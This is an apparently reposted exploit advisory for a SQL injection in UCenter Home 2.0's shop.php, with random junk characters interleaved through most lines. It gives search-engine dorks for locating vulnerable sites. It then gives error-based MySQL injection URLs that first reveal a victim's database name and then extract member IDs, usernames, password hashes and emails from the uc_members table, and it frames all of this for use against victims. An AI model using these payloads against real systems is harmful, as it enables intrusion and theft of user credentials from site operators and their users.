0 Q6 p& h. N+ N1 o
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ ) o- r; \& p2 }% ]
5 {6 n1 c% b% t- z. C
) P0 t/ i% _( Z3 H0 g1 F, I h7 L: N" W8 y& O/ y& F" V
*/ Author : KnocKout
1 a9 W# J: j. R- p, I' k/ f. L$ i2 ^ D, W/ T. i
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers - ?/ z5 p# u: L) U+ S4 M# G7 S
7 R; V0 J2 ^* |% ~1 u; E
*/ Contact: knockoutr@msn.com
. r: A, `* w4 z- s0 H& j5 c" a* Z4 j; D
*/ Cyber-Warrior.org/CWKnocKout J5 S7 D/ [" ^
& A+ m2 v( Y7 }# O__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
9 a! g5 a0 o u& {( {
# W+ ]- P t1 Z3 W8 c3 _4 a* o+ G0 xScript : UCenter Home
& \, R( p- ]" P6 M s4 P1 h c- ^# s; k6 X2 J& H
Version : 2.0 + O) y. o6 c- A6 q2 ?' S6 ?
' `/ z2 F4 I* j' Y) }: U9 LScript HomePage : http://u.discuz.net/
# R e* ?) e( P7 [/ E
3 r* x* ]( \8 k) U5 j5 P__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
4 @4 |( W* h0 A7 q; X: f
% D+ Y8 v' r9 W& m. i$ i W0 l7 WDork : Powered by UCenter inurl:shop.php?ac=view , z7 |1 {' X6 K2 V
/ q1 Q% a, F$ g! M8 TDork 2 : inurl:shop.php?ac=view&shopid=
- [1 D; j) ]+ @& O( E% l4 l8 R4 C: z8 Z0 B& H" E
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 6 f4 U) H( g* v; u7 G- @ d
4 r: p! }3 |; E. t8 G0 C7 \% ~6 S$ W; Y
Vuln file : Shop.php 2 o: o5 ^, |- \ I2 E/ E
3 v8 c; o; [* B8 N3 l/ l. w
value's : (?)ac=view&shopid=
; Y1 I- {2 m( c( ]& P* ?0 \3 `7 s% k: d) E( V5 \
Vulnerable Style : SQL Injection (MySQL Error Based) 0 H, ~! i* E+ Z3 U7 n7 a+ a
* x5 m# y$ `8 }
Need Metarials : Hex Conversion
7 `$ f' f$ `9 {8 t# [" j/ U) m
- u, h8 Q6 v% l/ \5 V__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
( c5 E2 C i! {: o7 T9 I2 l/ q1 N+ w& @0 X
Your Need victim Database name.
0 N# ~; d( R8 m! a. u2 k4 f1 @, Y5 E) k2 d, D* [
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 . g6 G" E" s' m5 V+ n9 l
; {5 q7 L, P+ D..
. n Z6 H. X* S# |
3 m) k: Z, G3 t) X$ s; WDB : Okey.
+ N6 N1 [7 |$ T v, w8 G- W, m6 @2 t( z: ?: b$ r
your edit DB `[TARGET DB NAME]` 1 V* C( G0 W0 C" A
. |: o% n# q. O2 MExample : 'hiwir1_ucenter'
- n& s" T" P2 Y- y8 W; l! y. q5 M% F- M7 {7 O+ M7 r7 E
Edit : Okey.
" ?. p; V O# P9 P' @% g, ~5 d1 q% {8 H8 S0 r
Your use Hex conversion. And edit Your SQL Injection Exploit.. $ e9 d3 k6 G+ U2 B
# ?5 h. r/ A2 N6 ?4 ^
. Z1 S. |. z+ f0 F4 P; u. j1 q8 z
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
' u" p4 Z" v: k) Q, R |
发表于 2013-2-27 21:31:31
收藏
支持
反对